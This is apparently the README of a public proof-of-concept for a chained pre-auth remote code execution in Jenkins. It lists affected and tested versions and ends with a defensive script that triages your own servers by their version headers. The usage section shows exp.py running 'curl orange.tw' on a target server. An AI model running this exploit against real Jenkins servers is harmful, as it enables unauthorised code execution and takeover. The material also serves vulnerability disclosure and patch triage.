awesome-jenkins-rce-2019

by orangetw

There has been no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 into a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disabled
    • Jenkins version < 2.138
  • ANONYMOUS_READ enabled (or with a normal user account)
    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
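For triaging your own Jenkins controllers against the Affect list, the following added example (not part of the original repository) parses the header output shown above and applies the two rows of the list. The function names, result labels, and the operator-supplied `anonymous_read` and `build_date` inputs are assumptions of this example.

```python
import re
from datetime import date

# Thresholds copied from the page's "Affect list".
FIRST_UNLISTED_VERSION = (2, 138)
BUILD_DATE_CUTOFF = date(2019, 1, 28)

def jenkins_version(raw_headers):
    """Return the X-Jenkins version as a tuple of ints, or None if absent/unparsable."""
    for line in raw_headers.splitlines():
        name, _, value = line.partition(":")
        value = value.strip()
        # Exact name match so X-Jenkins-Session / X-Jenkins-CLI-Port are ignored.
        if name.strip().lower() == "x-jenkins" and re.fullmatch(r"\d+(\.\d+)*", value):
            return tuple(int(part) for part in value.split("."))
    return None

def triage(raw_headers, anonymous_read, build_date=None):
    """Classify one of your own controllers against the Affect list.

    anonymous_read and build_date are operator-supplied (assumption: they are
    not visible in the response headers, so they come from your inventory).
    """
    version = jenkins_version(raw_headers)
    if version is None:
        return "unknown"
    if version < FIRST_UNLISTED_VERSION:
        # Row 1: listed as affected even with ANONYMOUS_READ disabled.
        return "affected-preauth"
    if build_date is None:
        # Row 2 is keyed on build time, which the version header does not carry.
        return "needs-build-date"
    if build_date < BUILD_DATE_CUTOFF:
        # Row 2: reachable anonymously, or by any normal user account.
        return "affected-preauth" if anonymous_read else "affected-with-account"
    return "not-listed"

# Constructed sample based on the header output shown under Usage.
SAMPLE = ("HTTP/1.1 200 OK\r\nX-Jenkins: 2.137\r\n"
          "X-Jenkins-Session: 20f72c2e\r\nX-Jenkins-CLI-Port: 50000\r\n")

if __name__ == "__main__":
    print(triage(SAMPLE, anonymous_read=False))
```

A result of `not-listed` only means the instance falls outside the ranges this page gives; it is not a statement about other vulnerabilities.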

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enabled
  • Jenkins 2.152 with ANONYMOUS_READ enabled
  • Jenkins 2.153 with ANONYMOUS_READ enabled
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Some slides from my HITB AMS 2019 talk (1.png, 2.png, 3.png).

References
